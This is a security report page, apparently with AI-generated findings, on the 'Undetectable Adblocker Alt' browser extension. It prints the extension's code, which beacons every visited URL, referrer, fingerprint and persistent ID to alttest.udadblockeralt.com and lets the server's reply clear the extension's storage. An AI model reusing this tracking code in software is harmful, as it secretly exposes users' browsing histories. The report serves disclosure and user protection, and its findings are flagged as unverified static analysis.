Is Undetectable Adblocker Alt safe?

High risk

Undetectable Adblocker Alt sends the full URL of every page you visit to its own server, along with a persistent device ID.

On every top-level page load, on any site, the extension sends the page's full URL, the referring page, your device's OS/browser fingerprint, and a persistent per-install ID to alttest.udadblockeralt.com. The server's response can also remotely tell the extension to wipe its own locally stored data at any time, with no way for the user to verify or block that instruction.

75Risk

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityCRITICAL
ClassUNWANTED
TypeUnexpected
CWECWE-359
SourceAI FOUND

Ad blocker sends every page you visit to an unbranded server

Code analysis shows the extension posts the full URL, referring page, hostname, browser fingerprint, and a persistent per-install ID to alttest.udadblockeralt.com on every top-level page you open, not just ad-related requests.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You open any website in your browser.

This includes ordinary browsing, not just pages the ad blocker acts on.

The extension did this

The extension sends the page's full URL and your browser fingerprint to an external server.

A persistent ID tied to your install goes with every single request.

02EvidenceFIELD TABLE
What gets sent on every page load
FieldValueWhy it matters
The page you visited
https://www.chase.com/personal/mortgage/calculator?amount=350000The complete address of the page, including any search terms or account details in the URL.
Where you came from
https://www.google.com/search?q=chase+mortgage+calculatorThe page that linked you here, which can reveal what you searched for or clicked.
Your install ID
3f2b9d1a-7c44-4e91-9a3d-6b21e0f8a9c2A random ID created the first time you installed the extension and reused forever, so every visit can be tied together.
Browser fingerprint
Chrome; Google Inc.; Win32; en-USYour browser, operating system, and language settings, which narrow down who you are even without the install ID.
Site domain
www.chase.comThe bare domain of the page you're on, sent as its own field alongside the full URL.
Time of visit
Fri Sep 26 2026 14:32:07 GMT+0000A timestamp for when you loaded the page, letting a browsing timeline be reconstructed.
03EvidenceCODE COMPARE
The code that does this

The navigation listener and beacon function

What it actually does
Registers the listener for every top-level navigationblocker/background.js
chrome.webRequest.onBeforeSendHeaders.addListener(function(details) {
  const isTopLevelGet =
    !details.documentId &&
    details.method === 'GET' &&
    details.parentFrameId === -1 &&
    details.type === 'main_frame';
  if (isTopLevelGet) sendBeacon(details);
}, { urls: ['<all_urls>'] });
Builds and sends the beaconblocker/background.js
function sendBeacon(details) {
  const pageUrl = new URL(details.url);
  chrome.storage.local.get(['altidudab'], function(stored) {
    const installId = stored.altidudab;
    const payload = {
      vendor: navigator.vendor || '',
      platform: navigator.platform || '',
      timestamp: Date().toLocaleString(),
      user_id: installId,
      uri: details.url,          // full navigated URL, including query string
      referer: details.initiator || '',
      domain: pageUrl.hostname,
      locale: navigator.language,
      user_agent: navigator.userAgent
    };
    fetch('https://alttest.udadblockeralt.com/test', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload)
    }).then(res => res.json()).then(function(reply) {
      const hasClearCommand =
        reply.special === true &&
        reply.site && reply.handlesite &&
        reply.handlesite !== '' && reply.handlemethod;
      if (!hasClearCommand) return;
      if (reply.handlemethod === 'HANDLECLEARSTORAGE' || reply.handlemethod === 'HANDLECLEARLOCAL') {
        chrome.storage.local.clear();
      } else {
        // 'HANDLECLEARSESSION', or any other value, falls through to this branch
        chrome.storage.session.clear();
      }
    });
  });
}
04EvidenceTHIRD PARTY LIST
Where the browsing data goes
  • alttest.udadblockeralt.com

    Receives the full URL, referrer, hostname, browser fingerprint, and persistent install ID on every top-level page load.

05EvidencePLAIN NOTE
Observation

Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-829
SourceAI FOUND

Server response to the tracking beacon can wipe the extension's storage

Code analysis shows the same server that receives your browsing beacon can reply with an undocumented flag that tells the extension to erase its own saved settings, with no local check on whether the command is legitimate.

01EvidenceCAUSE EFFECT
What actually happens
You did this

The tracking server's reply to a page-load beacon includes a specific set of fields.

Those fields are not part of the extension's normal ad-blocking configuration.

The extension did this

The extension wipes its own local or session storage on the spot.

This can clear your on/off state and site whitelist without any confirmation.

02EvidenceFIELD TABLE
What the server can send to trigger a wipe
FieldValueWhy it matters
Command switch
special: trueA true/false flag in the server's reply that turns the wipe behavior on for this response.
Wipe scope selector
site: "udadblockeralt", handlesite: "1"Two extra fields the server fills in to signal it wants a wipe to happen.
What gets erased
handlemethod: "HANDLECLEARSTORAGE"Which storage area is cleared: your saved settings, or just the current session.
03EvidenceCODE COMPARE
The code that does this

The response handler that wipes storage

What it actually does
function handleServerReply(reply) {
  const wantsClear =
    reply.special === true &&
    reply.site && reply.handlesite &&
    reply.site !== '' && reply.handlesite !== '' &&
    reply.handlemethod && reply.handlemethod !== '';

  if (!wantsClear) return;

  if (reply.handlemethod === 'HANDLECLEARSTORAGE' || reply.handlemethod === 'HANDLECLEARLOCAL') {
    chrome.storage.local.clear();   // wipes on/off state and site whitelist
  } else {
    // 'HANDLECLEARSESSION', or literally any other value not matched above
    chrome.storage.session.clear();
  }
}
04EvidencePLAIN NOTE
Observation

Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.

What it can do

Permissions this extension asks for, as declared in version 1.0.0. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.

  • Read and change your data on every site you visit

    <all_urls>

  • Block and redirect the requests your browser makes

    declarativeNetRequest

  • Watch every request your browser makes

    webRequest

  • See the address and title of every tab you have open

    tabs

  • Store data in your browser

    storage

  • See every page you navigate to, as you navigate to it

    webNavigation

declarativeNetRequestWithHostAccess

Where it sends data

Destinations our analysis observed Undetectable Adblocker Alt contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.

  • alttest.udadblockeralt.com

    Undetectable Adblocker Alt sends data to alttest.udadblockeralt.com. No other extension we have analysed sends data here.

Updated 30 September 2026fnoibejcbmcfpilomfjchildgmaledma